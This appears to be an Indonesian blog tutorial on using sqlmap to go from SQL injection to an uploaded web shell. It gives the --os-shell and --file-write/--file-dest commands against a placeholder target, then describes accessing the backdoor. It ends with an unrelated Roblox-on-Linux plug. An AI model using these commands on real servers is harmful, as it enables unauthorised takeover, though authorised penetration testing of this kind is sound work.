Cara Praktis Upload Shell Backdoor Menggunakan sqlmap

Bagi seorang pentester, menemukan celah keamanan SQL Injection (SQLi) adalah sebuah awal. Langkah selanjutnya yang sering dilakukan untuk membuktikan risiko keamanan yang lebih tinggi adalah mengambil alih sistem, salah satunya dengan cara mengunggah (upload) web shell atau backdoor.

Salah satu alat paling populer untuk kebutuhan ini adalah sqlmap. Selain otomatisasi eksploitasi database, sqlmap dibekali fitur canggih untuk berinteraksi langsung dengan sistem operasi target jika konfigurasinya mendukung.

Berikut ini adalah cara memanfaatkan fitur sqlmap untuk mengunggah shell ke server target.

Syarat Utama yang Harus Terpenuhi

Proses unggah file ini gak akan berhasil kalau beberapa syarat berikut belum terpenuhi pada server target:

  • Hak Akses DBA: User database yang dieksploitasi harus memiliki hak akses tinggi (seperti root di MySQL atau sa di SQL Server).
  • Fungsi File Diaktifkan: Pada MySQL, konfigurasi secure_file_priv harus kosong atau diatur agar mengizinkan operasi baca/tulis file.
  • Paham Jalur Direktori (Absolute Path): Kamu harus tahu lokasi pasti direktori web root target (misalnya /var/www/html/ atau C:\xampp\htdocs\) agar shell bisa diakses lewat browser.

Menggunakan Fitur –os-shell (Paling Otomatis)

Cara termudah adalah membiarkan sqlmap bekerja secara otomatis untuk membuatkan shell interaktif.

sqlmap -u "http://target.com/vuln.php?id=1" --os-shell

Cara Kerja:

  • Setelah perintah dijalankan, sqlmap akan menanyakan jenis bahasa pemrograman yang digunakan oleh web server target (pilih php, asp, atau jsp).
  • Selanjutnya, sqlmap akan meminta lokasi direktori web root. Kamu bisa memilih pencarian otomatis atau memasukkannya secara manual.
  • Jika berhasil, sqlmap akan langsung mengunggah dua file stager dan memberimu akses perintah OS shell langsung dari terminal.

Menggunakan Fitur –file-write dan –file-dest (Kustom)

Jika kamu sudah menyiapkan berkas backdoor kustom di komputer lokal dan ingin mengunggahnya secara spesifik ke folder tertentu di server, gunakan metode ini.

sqlmap -u "http://target.com/vuln.php?id=1" --file-write="/lokal/komputer/shell.php" --file-dest="/var/www/html/uploads/shell.php"

Penjelasan Parameter:

  • –file-write: Lokasi berkas shell atau backdoor yang ada di komputer kamu saat ini.
  • –file-dest: Lokasi absolut tujuan di server target tempat berkas tersebut akan disimpan.

Langkah Setelah Upload Berhasil

Jika proses selesai tanpa kendala, kamu tinggal mengakses berkas tersebut lewat browser atau alat bantu seperti AntSword/Godzilla tergantung jenis shell yang diunggah. Contoh: http://target.com/uploads/shell.php

Catatan Keamanan

Panduan eksploitasi di atas sebaiknya hanya dipraktikkan di laboratorium pribadi atau sistem yang sudah memiliki izin uji coba resmi (authorized pentesting). Melakukan peretasan tanpa izin adalah tindakan ilegal.

Sama seperti mengelola server, mengonfigurasi PC desktop untuk kebutuhan sehari-hari juga butuh trik khusus. Sebagai contoh, bagi kamu pengguna sistem operasi open-source yang ingin hiburan, kamu bisa mengikuti panduan cara install roblox linux sober agar bisa bermain dengan lancar lewat Flatpak runtime. Selalu pastikan sistem yang kamu kelola, baik server maupun desktop, dikonfigurasi dengan aman!